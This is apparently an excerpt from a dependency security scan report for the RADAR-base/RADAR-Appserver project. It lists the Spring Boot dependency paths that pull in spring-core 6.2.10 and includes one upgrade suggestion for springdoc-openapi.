Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
